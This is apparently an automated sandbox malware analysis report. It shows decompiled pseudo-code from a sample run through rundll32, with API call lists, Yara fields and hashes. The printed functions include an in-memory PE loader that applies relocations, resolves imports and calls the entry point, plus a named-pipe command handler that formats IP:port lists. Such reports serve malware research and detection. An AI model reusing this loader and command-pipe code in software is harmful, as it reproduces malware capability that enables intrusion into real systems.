            					if(_t54 != 0) {
            						_push(0);
            						_push(_t100);
            						_push(0x446c9d8);
            						_t55 = E04459C50(_t54);
            						_t169 = _t168 + 0x10;
            						_t101 = _t55;
            						__eflags = _v592;
            						if(__eflags != 0) {
            							_t56 = E04459AB3(_v596);
            							_t116 = _t101;
            							 *0x446f990 = _t56;
            							 *0x446f988 = E04459AB3(_t116);
            							L12:
            							_push(_t116);
            							_t157 = E0445A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
            							_t170 = _t169 + 0x10;
            							__eflags = _t157;
            							if(_t157 == 0) {
            								goto L36;
            							}
            							_push(0x446ca26);
            							_t146 = 0xe;
            							E0445AC36(_t146, _t175);
            							E0445AC6F(_t157, _t175, _t101);
            							_t163 = _a4;
            							_push( *_t163);
            							E0445AC11(0xb);
            							_t148 =  *(_t163 + 0x10);
            							__eflags =  *(_t163 + 0x10);
            							if( *(_t163 + 0x10) != 0) {
            								E0445B1B1(_t148, _t175);
            							}
            							_t149 =  *(_t163 + 0xc);
            							__eflags = _t149;
            							if(_t149 != 0) {
            								E0445B1B1(_t149, _t175);
            							}
            							_t65 = E0445A1F8(0);
            							_push(_t149);
            							_t150 = 2;
            							_t66 = E0445ABE3();
            							__eflags = _v592;
            							_t127 = _t65;
            							if(_v592 == 0) {
            								_t127 =  *0x446f8d4; // 0x450fc00
            								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									_t67 = E04460DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
            									_t170 = _t170 + 0xc;
            									goto L21;
            								}
            								_t127 = _t127 + 0x228;
            								goto L20;
            							} else {
            								_t68 =  *0x446f8d4; // 0x450fc00
            								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									L27:
            									__eflags =  *(_t68 + 0x1898) & 0x00000082;
            									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
            										_t152 = 0x64;
            										E0445F15B(_t152);
            									}
            									E0445565D( &_v580, _t175);
            									_t159 = _a8;
            									_t128 = _t127;
            									__eflags = _t159;
            									if(_t159 != 0) {
            										_t71 =  *0x446f8d4; // 0x450fc00
            										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
            										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
            											lstrcpyW(_t159, _t101);
            										} else {
            											_t73 = E0445109A(_t128, 0x153);
            											_v596 = _t73;
            											lstrcpyW(_t159, _t73);
            											E04458D9A( &_v596);
            											 *_t170 = "\"";
            											lstrcatW(_t159, ??);
            											lstrcatW(_t159, _t101);
            											lstrcatW(_t159, "\"");
            										}
            									}
            									_t70 = _a12;
            									__eflags = _t70;
            									if(_t70 != 0) {
            										 *_t70 = _v588;
            									}
            									_t161 = 0;
            									__eflags = 0;
            									goto L36;
            								}
            								_t32 = _t68 + 0x228; // 0x450fe28
            								_t127 = _t32;
            								L20:
            								_t67 = E044558D2(_t127, _t101, __eflags);
            								L21:
            								__eflags = _t67;
            								if(_t67 >= 0) {
            									_t68 =  *0x446f8d4; // 0x450fc00
            									goto L27;
            								}
            								_push(0xfffffffd);
            								L6:
            								_pop(_t161);
            								goto L36;
            							}
            						}
            						_t83 = E0445D210(_v588, __eflags);
            						_v596 = _t83;
            						_t84 =  *0x446f8d0; // 0x450f8c0
            						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
            						__eflags = _t85 - _t161;
            						if(_t85 != _t161) {
            							_t86 =  *0x446f8d0; // 0x450f8c0
            							 *((intOrPtr*)(_t86 + 0x30))();
            							E04458DDF( &_v632, _t161);
            							_t116 = _t85;
            							goto L12;
            						}
            						E04458DDF( &_v628, _t161);
            						_t61 = 1;
            						goto L37;
            					}
            					_push(0xfffffffe);
            					goto L6;
            				} else {
            					_t93 = E0445308A( &_v532, _t161, 0x105);
            					_t173 = _t93;
            					if(_t93 == 0) {
            						L36:
            						_t61 = _t161;
            						L37:
            						return _t61;
            					}
            					goto L4;
            				}
            			}

            APIs
            • memset.MSVCRT ref: 04455061
            • lstrcpyW.KERNEL32 ref: 044552C7
            • lstrcatW.KERNEL32(00000000,?), ref: 044552E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 044552E9
            • lstrcatW.KERNEL32(00000000,0446CA28), ref: 044552F1
              • Part of subcall function 04458DDF: HeapFree.KERNEL32(00000000,00000000), ref: 04458E25
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: 8a46a34c7f85cad44c808313e760e1b95bb0587b5eb1464624c6291b0b9b7037
            • Instruction ID: 196a3e70f9bd83151d93960ae673d15f76333d21287deaead059ac55ebfaf1de
            • Opcode Fuzzy Hash: 8a46a34c7f85cad44c808313e760e1b95bb0587b5eb1464624c6291b0b9b7037
            • Instruction Fuzzy Hash: 0A71CF71704300ABEF14EB25E884B7B73E9EB84714F14052FF8459B2A6EF74B8088B52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0445DEAB(WCHAR* __ecx) {
            				int _v8;
            				WCHAR* _v12;
            				WCHAR* _v16;
            				WCHAR* _v140;
            				WCHAR* _v144;
            				short _v664;
            				signed int _t28;
            				signed int _t29;
            				signed int _t30;
            				WCHAR* _t36;
            				int _t40;
            				signed int _t41;
            				int _t44;
            				signed int _t45;
            				WCHAR* _t49;
            				signed int _t51;
            				WCHAR* _t52;
            				void* _t53;
            
            				_v8 = _v8 & 0x00000000;
            				_v16 = __ecx;
            				_t51 = 0;
            				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
            				_t44 = _v8;
            				_t41 = 0;
            				_v12 = _t28;
            				if(_t44 <= 0) {
            					L22:
            					_t29 = _t28 | 0xffffffff;
            					__eflags = _t29;
            					return _t29;
            				} else {
            					goto L1;
            				}
            				do {
            					L1:
            					_t49 =  *(_t28 + _t41 * 4);
            					_t30 =  *_t49 & 0x0000ffff;
            					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
            						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
            						_t40 = lstrlenW(_t49);
            						_t45 = 0;
            						if(_t40 <= 0) {
            							L11:
            							_t44 = _v8;
            							_t51 = _t51 + 1;
            							goto L12;
            						} else {
            							goto L8;
            						}
            						do {
            							L8:
            							if(_t49[_t45] == 0x2c) {
            								_t49[_t45] = 0;
            							}
            							_t45 = _t45 + 1;
            						} while (_t45 < _t40);
            						goto L11;
            					}
            					L12:
            					_t28 = _v12;
            					_t41 = _t41 + 1;
            				} while (_t41 < _t44);
            				if(_t51 != 1) {
            					if(__eflags <= 0) {
            						goto L22;
            					}
            					_t52 = _v140;
            					L17:
            					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
            						lstrcpynW(_v16, _t52, 0x104);
            					} else {
            						GetCurrentDirectoryW(0x104,  &_v664);
            						_push(0);
            						_push(_t52);
            						_push(0x446c9d8);
            						_t36 = E04459C50( &_v664);
            						_v12 = _t36;
            						lstrcpynW(_v16, _t36, 0x104);
            						E04458DDF( &_v12, 0xfffffffe);
            					}
            					return 0;
            				}
            				_t52 = _v144;
            				goto L17;
            			}

            APIs
            • GetCommandLineW.KERNEL32 ref: 0445DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0445DECB
            • lstrlenW.KERNEL32 ref: 0445DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0445DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0445DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0445DFA9
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: 1aa826ea696741df9d3bd191016ed6d7b3597fdd23943a99a05fd41a72b10f28
            • Instruction ID: 9d30fb934fc57239e67d913461b834c5a68479ef8c614bc2a2594076d4e03807
            • Opcode Fuzzy Hash: 1aa826ea696741df9d3bd191016ed6d7b3597fdd23943a99a05fd41a72b10f28
            • Instruction Fuzzy Hash: 8E31C7F2D00115FBEF24AF55DC88AAEB7B9EF45315F10815BEC05E3261DB70A9818B51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0445E6ED
            • SysAllocString.OLEAUT32(?), ref: 0445E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0445E709
            • SysFreeString.OLEAUT32(?), ref: 0445E784
            • SysFreeString.OLEAUT32(?), ref: 0445E787
            • SysFreeString.OLEAUT32(?), ref: 0445E78C
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 7a65b3976ddae259b7aea533feb0021e3a01e3c8ae8e522b1ab99bdada602479
            • Instruction ID: e136a69505e2a60991380a0fcd700d4c6af31dadd728a9093c082ef0502e4577
            • Opcode Fuzzy Hash: 7a65b3976ddae259b7aea533feb0021e3a01e3c8ae8e522b1ab99bdada602479
            • Instruction Fuzzy Hash: 3D21FDB5A00218FFDF00DFA5CC88DAFBBBDEF48654B20449AF505A7251DA71AE01CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 20%
            			E04463DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
            				signed int _v5;
            				signed short _v12;
            				intOrPtr* _v16;
            				intOrPtr _v20;
            				signed int* _v24;
            				unsigned int _v28;
            				signed short* _v32;
            				struct HINSTANCE__* _v36;
            				signed int _v40;
            				signed int _v44;
            				intOrPtr* _v48;
            				signed short* _v52;
            				intOrPtr _v56;
            				unsigned int _v60;
            				intOrPtr _v64;
            				_Unknown_base(*)()* _v68;
            				signed int _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				intOrPtr _v84;
            				unsigned int _v88;
            				intOrPtr _v92;
            				signed int _v96;
            				intOrPtr _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				intOrPtr _v112;
            				CHAR* _v116;
            				signed int _v120;
            				intOrPtr _v124;
            				signed int _v128;
            				signed int _v132;
            				signed int _t216;
            				signed int _t233;
            				void* _t273;
            				signed int _t278;
            				signed int _t280;
            				intOrPtr _t320;
            
            				_v44 = _v44 & 0x00000000;
            				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            				_v20 = _v84;
            				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
            				_v64 = _t320;
            				if(_t320 == 0) {
            					L13:
            					while(0 != 0) {
            					}
            					_push(8);
            					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
            						L35:
            						if(_a16 == 0) {
            							L54:
            							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
            							while(0 != 0) {
            							}
            							if(_a12 != 0) {
            								 *_a12 = _v80;
            							}
            							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
            							_v124 = _v80(_a4, 1, _a8);
            							while(0 != 0) {
            							}
            							if(_v124 != 0) {
            								if(_v44 == 0) {
            									L77:
            									return 1;
            								}
            								if(_a20 != 1) {
            									if(_a20 != 2) {
            										L75:
            										while(0 != 0) {
            										}
            										goto L77;
            									}
            									while(0 != 0) {
            									}
            									_v132 = _v44;
            									goto L75;
            								}
            								while(0 != 0) {
            								}
            								_v44();
            								goto L75;
            							}
            							while(0 != 0) {
            							}
            							return 0;
            						}
            						while(0 != 0) {
            						}
            						_push(8);
            						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
            							goto L54;
            						}
            						_v128 = 0x80000000;
            						_t216 = 8;
            						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
            						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
            						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
            						_v104 =  *((intOrPtr*)(_v76 + 0x18));
            						while(0 != 0) {
            						}
            						_v40 = _v40 & 0x00000000;
            						while(_v40 < _v104) {
            							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
            							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
            							if(lstrcmpA(_v116, _a16) != 0) {
            								_v40 = _v40 + 1;
            								continue;
            							}
            							while(0 != 0) {
            							}
            							_v44 = _v120;
            							break;
            						}
            						if(_v44 != 0) {
            							goto L54;
            						}
            						while(0 != 0) {
            						}
            						return 0xffffffff;
            					}
            					_v96 = 0x80000000;
            					_t233 = 8;
            					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						if(_v36 == 0) {
            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						}
            						if(_v36 != 0) {
            							if( *_v16 == 0) {
            								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
            							} else {
            								_v24 =  *_v16 + _a4;
            							}
            							_v72 = _v72 & 0x00000000;
            							while( *_v24 != 0) {
            								if(( *_v24 & _v96) == 0) {
            									_v100 =  *_v24 + _a4;
            									_v68 = GetProcAddress(_v36, _v100 + 2);
            								} else {
            									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
            								}
            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
            									 *_v24 = _v68;
            								} else {
            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
            								}
            								_v24 =  &(_v24[1]);
            								_v72 = _v72 + 4;
            							}
            							_v16 = _v16 + 0x14;
            							continue;
            						} else {
            							_t273 = 0xfffffffd;
            							return _t273;
            						}
            					}
            					goto L35;
            				}
            				_t278 = 8;
            				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
            				_t280 = 8;
            				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
            				while(0 != 0) {
            				}
            				while(_v56 > 0) {
            					_v28 = _v52[2];
            					_v56 = _v56 - _v28;
            					_v28 = _v28 - 8;
            					_v28 = _v28 >> 1;
            					_v32 =  &(_v52[4]);
            					_v92 = _a4 +  *_v52;
            					_v60 = _v28;
            					while(1) {
            						_v88 = _v60;
            						_v60 = _v60 - 1;
            						if(_v88 == 0) {
            							break;
            						}
            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
            						_v12 =  *_v32 & 0xfff;
            						_v48 = (_v12 & 0x0000ffff) + _v92;
            						if((_v5 & 0x000000ff) != 3) {
            							if((_v5 & 0x000000ff) == 0xa) {
            								 *_v48 =  *_v48 + _v64;
            							}
            						} else {
            							 *_v48 =  *_v48 + _v64;
            						}
            						_v32 =  &(_v32[1]);
            					}
            					_v52 = _v32;
            				}
            				goto L13;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 04463F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 04463F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 04463FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 04463FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 044640B3
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: 9ef4ca4ccfb598c2370e440a6953979c825fb973104e7974568f2c4005143921
            • Instruction ID: a4739d2ead622457ec072e929716cb1164bebdf4e50ee256fbe8df010404d717
            • Opcode Fuzzy Hash: 9ef4ca4ccfb598c2370e440a6953979c825fb973104e7974568f2c4005143921
            • Instruction Fuzzy Hash: 17E19075A00219DFDF24CFA8C884AAEBBF1FF08315F14855AE816AB351D734A981CF65
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 261b9a98062580924a474e1559bfd83f6ecafb1f7f3306ca941535267a6c08ca
            • Instruction ID: ff65bdfa7ec5d6114b550429d8edf9f26f3f19f98133496b48868302d844308e
            • Opcode Fuzzy Hash: 261b9a98062580924a474e1559bfd83f6ecafb1f7f3306ca941535267a6c08ca
            • Instruction Fuzzy Hash: D641D47170020AA7EF248DA89D99ABF366CDF40B15F280217FD03D6340F6A4F9919A93
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E0445E485(void* __ecx) {
            				char _v8;
            				void* _v12;
            				char* _t15;
            				intOrPtr* _t16;
            				void* _t21;
            				intOrPtr* _t23;
            				intOrPtr* _t24;
            				intOrPtr* _t25;
            				void* _t30;
            				void* _t33;
            
            				_v12 = 0;
            				_v8 = 0;
            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
            				_t15 =  &_v12;
            				__imp__CoCreateInstance(0x446c8a0, 0, 1, 0x446c8b0, _t15);
            				if(_t15 < 0) {
            					L5:
            					_t23 = _v8;
            					if(_t23 != 0) {
            						 *((intOrPtr*)( *_t23 + 8))(_t23);
            					}
            					_t24 = _v12;
            					if(_t24 != 0) {
            						 *((intOrPtr*)( *_t24 + 8))(_t24);
            					}
            					_t16 = 0;
            				} else {
            					__imp__#2(__ecx);
            					_t25 = _v12;
            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
            					if(_t21 < 0) {
            						goto L5;
            					} else {
            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
            						if(_t21 < 0) {
            							goto L5;
            						} else {
            							_t16 = E04458DC9(8);
            							if(_t16 == 0) {
            								goto L5;
            							} else {
            								 *((intOrPtr*)(_t16 + 4)) = _v12;
            								 *_t16 = _v8;
            							}
            						}
            					}
            				}
            				return _t16;
            			}

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4A9
            • CoCreateInstance.OLE32(0446C8A0,00000000,00000001,0446C8B0,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0445E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4F6
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: 6c1f3e05b24fa66073d022e9c5e7469d9dfb20b8fa6933aebb7ead6b3f492f9a
            • Instruction ID: 083313eebf1e1e88cb9a1657dc24859959024408a74a53005d66343b4b96a0eb
            • Opcode Fuzzy Hash: 6c1f3e05b24fa66073d022e9c5e7469d9dfb20b8fa6933aebb7ead6b3f492f9a
            • Instruction Fuzzy Hash: A5210C74600245BBEF248BA6DC4DE9BBF7CEFC6B15F20015DF905962A1D6B1AA00CA61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E044633DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
            				signed int _t12;
            				signed int _t13;
            				signed int _t23;
            				void* _t30;
            				char* _t31;
            				char* _t33;
            				char* _t35;
            				char* _t37;
            				char* _t38;
            				long long* _t40;
            
            				_t30 = __edi;
            				_t12 = _a20;
            				if(_t12 == 0) {
            					_t12 = 0x11;
            				}
            				_t35 = _a4;
            				_push(_t25);
            				 *_t40 = _a12;
            				_push(_t12);
            				_push("%.*g");
            				_push(_a8);
            				_push(_t35);
            				L04463533();
            				_t23 = _t12;
            				if(_t23 < 0 || _t23 >= _a8) {
            					L16:
            					_t13 = _t12 | 0xffffffff;
            					goto L17;
            				} else {
            					E044633B3(_t12, _t35);
            					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
            						L8:
            						_push(_t30);
            						_t37 = strchr(_t35, 0x65);
            						_t31 = _t37;
            						if(_t37 == 0) {
            							L15:
            							_t13 = _t23;
            							L17:
            							return _t13;
            						}
            						_t38 = _t37 + 1;
            						_t33 = _t31 + 2;
            						if( *_t38 == 0x2d) {
            							_t38 = _t33;
            						}
            						while( *_t33 == 0x30) {
            							_t33 = _t33 + 1;
            						}
            						if(_t33 != _t38) {
            							E04458ECB(_t38, _t33, _t23 - _t33 + _a4);
            							_t23 = _t23 + _t38 - _t33;
            						}
            						goto L15;
            					} else {
            						_t6 = _t23 + 3; // 0x4461bc5
            						_t12 = _t6;
            						if(_t12 >= _a8) {
            							goto L16;
            						}
            						_t35[_t23] = 0x302e;
            						( &(_t35[2]))[_t23] = 0;
            						_t23 = _t23 + 2;
            						goto L8;
            					}
            				}
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: 053b1fdf51ef7d84cac630fd33a350b14df4190b8e4979093e763c3fad69b8fd
            • Instruction ID: 3bd4754f376f78a89d953c19098fe15a1ba8b3c65932e0e479dbb0099b8fa5ac
            • Opcode Fuzzy Hash: 053b1fdf51ef7d84cac630fd33a350b14df4190b8e4979093e763c3fad69b8fd
            • Instruction Fuzzy Hash: 7D215B3270469427EF329E9DEC86BABB7989F01768F14002BFC4786281E6A0F94143D3
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E04453775(void* __fp0) {
            				signed int _v144;
            				signed int _v152;
            				char _v160;
            				char _v164;
            				char _v168;
            				signed int _v172;
            				char _v176;
            				intOrPtr _v180;
            				signed int _v184;
            				signed int _v188;
            				signed int _v192;
            				signed int _v196;
            				char _v200;
            				signed int _v204;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				signed int _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t87;
            				signed int _t88;
            				signed int _t100;
            				void* _t102;
            				void* _t103;
            				unsigned int* _t104;
            				signed int _t110;
            				signed int _t113;
            				void* _t118;
            				intOrPtr _t124;
            				signed int _t127;
            				intOrPtr _t129;
            				intOrPtr _t132;
            				void* _t133;
            				void* _t136;
            				signed int _t145;
            				signed int _t147;
            				signed short* _t148;
            				signed int _t158;
            				intOrPtr* _t182;
            				void* _t186;
            				void* _t187;
            				void* _t188;
            				signed short* _t191;
            				void* _t195;
            				signed int _t198;
            				signed int _t199;
            				signed int _t203;
            				signed int _t204;
            				char _t205;
            				signed int _t207;
            				void* _t209;
            				void* _t215;
            				void* _t222;
            
            				_t222 = __fp0;
            				_t209 = (_t207 & 0xfffffff8) - 0xac;
            				_v144 = 0;
            				_v172 = 0;
            				while(1) {
            					_t72 =  *0x446f8d0; // 0x450f8c0
            					_push(0);
            					_push( *0x446f8b4);
            					_v152 = 0;
            					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
            						break;
            					}
            					_push(0);
            					_push( &_v160);
            					_t75 =  *0x446f8d0; // 0x450f8c0
            					_push(0x80000);
            					_push( *0x446f974);
            					_push( *0x446f8b4);
            					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
            						GetLastError();
            						goto L56;
            					} else {
            						_t148 =  *0x446f974; // 0x0
            						_t80 =  *_t148 & 0x0000ffff;
            						_t215 = _t80 - 8;
            						if(_t215 > 0) {
            							_t81 = _t80 - 9;
            							__eflags = _t81;
            							if(_t81 == 0) {
            								E044609C3( &_v200);
            								L12:
            								_t84 =  &_v200;
            								L13:
            								_push(4);
            								L14:
            								_push(_t84);
            								_push(5);
            								L31:
            								_pop(_t186);
            								E0445D297(_t186);
            								L32:
            								L56:
            								DisconnectNamedPipe( *0x446f8b4);
            								_push(0);
            								_pop(0);
            								_push(1);
            								_pop(1);
            								if(_v172 == 0) {
            									continue;
            								}
            								break;
            							}
            							_t87 = _t81;
            							__eflags = _t87;
            							if(_t87 == 0) {
            								_v204 = 0;
            								_t88 = E044516B0( &_v204, _t222);
            								_v188 = _t88;
            								__eflags = _t88;
            								if(_t88 == 0) {
            									_push(4);
            									_v192 = 0;
            									_push( &_v192);
            									L19:
            									_push(0xa);
            									goto L31;
            								}
            								_t145 = _v204;
            								_t90 = _t145 * 0x16;
            								_v184 = _t145 * 0x16;
            								_t203 = E04458DC9(_t90);
            								_v192 = _t203;
            								__eflags = _t203;
            								if(_t203 == 0) {
            									_t64 =  &_v192;
            									 *_t64 = _v192 & 0x00000000;
            									__eflags =  *_t64;
            									_push(4);
            									_push( &_v192);
            									_t187 = 0xa;
            									E0445D297(_t187);
            									L52:
            									E04458DDF( &_v188, _t145);
            									goto L32;
            								}
            								_t198 = 0;
            								__eflags = _t145;
            								if(_t145 == 0) {
            									L50:
            									_push(E0445A5D0(_t203));
            									_push(_t203);
            									_t188 = 5;
            									E0445D297(_t188);
            									E04458DDF( &_v192, 0xffffffff);
            									_t209 = _t209 + 0x10;
            									goto L52;
            								}
            								_t158 = _v188 + 4;
            								__eflags = _t158;
            								_v204 = _t158;
            								do {
            									__eflags = _t198;
            									if(_t198 != 0) {
            										__eflags = _t198 - _t145 - 1;
            										if(_t198 < _t145 - 1) {
            											_t102 = E0445A5D0(_t203);
            											_t158 = _v204;
            											 *((short*)(_t102 + _t203)) = 0x3b;
            										}
            									}
            									_t100 =  *_t158;
            									_v196 = _t100;
            									__eflags = _t100;
            									if(_t100 != 0) {
            										_t103 = E0445A5D0(_t203);
            										_t104 = _v204;
            										_push(_t104[1] & 0x0000ffff);
            										_push( *_t104 >> 0x18);
            										_push(_t104[0] & 0x000000ff);
            										_push(_t104[0] & 0x000000ff);
            										_t110 = E0445A5D0(_t203) + _t203;
            										__eflags = _t110;
            										E04459FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
            										_t158 = _v204;
            										_t209 = _t209 + 0x20;
            									}
            									_t198 = _t198 + 1;
            									_t158 = _t158 + 0x20;
            									_v204 = _t158;
            									__eflags = _t198 - _t145;
            								} while (_t198 < _t145);
            								goto L50;
            							}
            							__eflags = _t87 != 1;
            							if(_t87 != 1) {
            								goto L56;
            							}
            							_v204 = 0;
            							_t113 = E044516B0( &_v204, _t222);
            							_t204 = _v204;
            							_v196 = _t113;
            							__eflags = _t113;
            							if(_t113 != 0) {
            								E04458DDF( &_v196, _t204);
            							}
            							_v204 = _t204 * 0x16;
            							_t84 =  &_v204;
            							goto L13;
            						}
            						if(_t215 == 0) {
            							_t84 = E044609C3( &_v200);
            							L16:
            							__eflags = _t84;
            							if(_t84 == 0) {
            								_push(0);
            								_push(0);
            								goto L19;
            							}
            							_push(_v200);
            							goto L14;
            						}
            						_t118 = _t80 - 1;
            						if(_t118 == 0) {
            							_t199 = E04459D29( &(_t148[4]), 0x20, 1,  &_v176);
            							_v196 = _t199;
            							__eflags = _t199;
            							if(_t199 == 0) {
            								L30:
            								_t191 =  *0x446f974; // 0x0
            								E0445A06E( &_v164,  &(_t191[4]), 0x80);
            								_push(0x84);
            								_push( &_v168);
            								_push(2);
            								goto L31;
            							}
            							_t205 = _v176;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								_t124 = E04451D97(E0445A102( *_t199, __eflags), 0, 0, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t124;
            								goto L30;
            							}
            							_t125 = _t205 - 1;
            							_v184 = _t205 - 1;
            							_t127 = E04458DC9(_t125 << 2);
            							_v188 = _t127;
            							__eflags = _t127;
            							if(_t127 == 0) {
            								goto L30;
